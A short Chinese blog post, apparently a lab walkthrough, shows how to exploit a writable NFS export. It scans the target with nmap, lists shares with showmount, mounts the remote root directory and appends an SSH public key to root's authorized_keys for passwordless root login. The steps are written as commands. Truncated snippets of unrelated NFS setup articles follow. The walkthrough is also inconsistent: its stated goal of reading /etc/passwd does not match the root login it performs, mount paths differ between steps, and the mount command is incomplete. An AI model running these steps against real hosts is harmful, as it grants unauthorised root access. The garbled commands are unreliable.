目的:利用nfs服务的共享目录配置漏洞,读取目标主机的/etc/passwd文件
原理:NFS服务配置漏洞,赋予了根目录远程可写权限,导致/root/ssh/authorized_keys可被修改,实现远程ssh无密码登录。
步骤:nmap -p0-65535 192.168.1.3 查看目标主机上nfs服务是否开启,
输入:showmount -e 192.168.1.3,查看指定的远程共享目录列表。
输入:ssh-keygen (一路回车),生成sa公钥;
输入:mkdir /tmp/tool , 建立tool目录,
输入:mount -t nfs 192.168.1.3:/tmp/tool/ , 把.1.3的根目录挂载到tool目录下,
输入:cat /root/.ssh/id_rsa.pub >> /tmp/t001/root/.ssh/authorized_keys , 把生成的公钥追加到靶机dauthorized_keys目录下,实现ssh免密码登录;
输入:ssh root@192.168.1.3 , 登录进目标主机。
目的:利用nfs服务的共享目录配置漏洞,读取目标主机的/etc/passwd文件原理:NFS服务配置漏洞,赋予了根...
NFS 目录共享服务 安装 配置共享 重启nfsfuwu 查看本机共享目录信息 查看nfs运行情况 配置防火墙 挂载
一、共享存储NFS部署 1、关闭防火墙 2、安装配置 nfs 3、共享目录设置权限: 4、配置 nfs,nfs 的...
NFS服务端 安装NFS 配置共享目录 启动NFS 服务3.1 设置开机启动sudo systemctl enab...
一 服务器端 安装nfs服务 创建nfs共享目录(不能在/root目录下) 修改配置文件 修改nfs_share目...
ubuntu 安装 nfs 服务: 修改配置文件: 重启nfs服务: 查看服务端的共享目录: 挂载到本地目录: c...
nfs服务器搭建 在服务端创建一个共享目录 /nfs(目录可自定义) 修改 NFS 配置文件 vim /etc/e...
NFS 服务搭建 [TOC] 安装 配置 exports文件配置格式 [共享目录] [客户端地址1(权限)] [客...
nfs语法参数解释(1) nfs共享目录:是NFS服务器需要共享出去的实际目录,文件夹,必须写绝对路径,且注意目录...
目录 一、NFS介绍二、NFS服务端安装配置三、NFS配置选项 一、NFS介绍 NFS:Network File ...
本文标题:Nmap --- NFS共享目录配置漏洞
本文链接:https://www.haomeiwen.com/subject/audvcxtx.html
网友评论